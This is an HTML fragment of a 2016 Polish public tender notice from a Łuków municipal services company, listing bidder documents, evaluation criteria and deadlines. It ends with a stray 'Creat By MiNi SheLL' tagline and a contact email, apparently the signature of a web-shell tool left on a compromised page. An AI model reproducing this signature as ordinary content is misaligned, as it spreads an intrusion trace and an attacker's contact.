<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Oświadczenie o spełnianiu warunków udziału w postępowaniu , zgodnie z art. 44 ustawy wraz z oświadczeniem o braku podstaw do wykluczenia (wzór - Zał. nr 15 do SIWZ),
2) Pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia publicznego w przypadku, gdy nie wynika ono z wpisu do KRS lub CEIDG,
3) Dowód wniesienia wadium,
4) Oświadczenie dotyczące przynależności do grupy kapitałowej (wzór - Zał. nr 19 do SIWZ) i w wypadku potwierdzenia przynależności - listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust.2 pkt 5 Ustawy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - Rękojmia - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 Prawa zamówień publicznych przewiduje się możliwość dokonania zmiany warunków umowy w zakresie wynagrodzenia w przypadku zmiany w trakcie obowiązywania umowy stawki podatku od towarów i usług. Do zmiany dojdzie na warunkach określonych w § 9 ust. 6 wzoru umowy (Zał. Nr 14 do SIWZ).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.puik.lukow.pl w zakładce Przetargi (SIWZ bez dużych map, rysunków)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ w postaci papierowej można odebrać: Przedsiębiorstwo Usług i Inżynierii Komunalnej Sp. z o.o., 21-400 Łuków, ul. Partyzantów 6b za odpłatnością 300 zł. netto (bez VAT).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.06.2016 godzina 12:00, miejsce: Sekretariat siedziby Zamawiającego w Łukowie, przy ul. Partyzantów 6b lub drogą pocztową. Dla oferty przesyłanej pocztą liczy się data i godzina jej doręczenia do Zamawiającego..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com